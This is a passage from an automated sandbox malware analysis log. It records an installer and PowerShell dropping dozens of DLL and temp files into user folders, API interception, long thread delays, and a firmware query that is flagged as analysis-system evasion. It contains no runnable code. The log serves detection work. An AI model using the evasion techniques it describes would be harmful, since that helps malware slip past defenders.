                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSystem information queried: FirmwareTableInformation
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeAPI/Special instruction interceptor: Address: 596876E2
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeAPI/Special instruction interceptor: Address: 5954891D
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeAPI/Special instruction interceptor: Address: 5968CCA4
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeAPI/Special instruction interceptor: Address: 596760AA
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeAPI/Special instruction interceptor: Address: 595F5694
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeAPI/Special instruction interceptor: Address: 5957B62E
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeAPI/Special instruction interceptor: Address: 596037FE
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeAPI/Special instruction interceptor: Address: 596D16A6
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeAPI/Special instruction interceptor: Address: 596AF56B
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeAPI/Special instruction interceptor: Address: 59733DCC
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeAPI/Special instruction interceptor: Address: 76F17C44
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3463
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6354
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\UninstallFanCtrlSvcLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-LB16K.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\ICSharpCode.SharpZipLib.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msvcr80.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.Storage.Common.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\FAN.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-CCHIR.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-4L189.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-O6NPJ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BIPBA.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.Storage.Blob.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\aaHMLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MB90D.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5OpenGL.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\SDL3.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-56DJF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140_1d.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-QPNLV.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Sql.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\NICInfoLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Uninstaller.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-RGA67.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Data.Entity.Design.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-03H4T.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HardDiskCapacityLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\windowplugin.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.SharePoint.BusinessData.Administration.Client.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-1BB9P.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-LLMGF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\MB_Home.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\NuGet.Build.Tasks.Pack.resources.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-QM6QO.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\System.ServiceModel.Web.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-HA2SV.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140d.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-IOD6F.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\WinPixSysMonController.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HttpUtilityV2.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\PocoInitializer.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\SDL3_ttf.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HWComponentPlugin.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Network.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-Q7DQ7.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DeviceUninstall.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\USBInfoLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-OGG5H.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-87NKD.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-IR9SP.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\LogHelper.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\libssl-1_1-x64.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\UserExperienceImprovementPlugin.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DRAMSpeedLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\VGAManufacturerLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BHL7J.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\ti_managers_proxy_stub.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DRAMManufacturerLib.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CloudStorageService.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-8VJ6H.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-EVHCR.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9EE7H.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\msvcp140_1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Core.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.KeyVault.Core.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Steam2.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\msvcp140.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-N2CN3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-NEQ1G.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9SPC4.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\bass.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-I6BL7.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-KH84M.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Developer.IdentityService.GitHubProvider.UI.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-U43LQ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-AOFIL.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\mc_dec_aac.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9IN29.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\libusb-1.0.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-EQNNJ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DIMMCapacityLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-D20BS.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.NET.Build.Extensions.Tasks.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DUCDE.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-UADI4.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\cpuidsdk.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\libcrypto-1_1-x64.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-I30SH.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\VGATypeLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\OPHWInfo.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.VisualStudio.Text.Logic.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-TCI75.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Newtonsoft.Json.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9K44C.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-RHD94.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Svg.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-56B19.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\KillProcess.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AIControlLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\ServiceUninstall.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\CPUTypeCmdLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-NMS81.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AsSQLHelper.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AsusBusinessIntelligenceCPPLib.dll (copy)Jump to dropped file
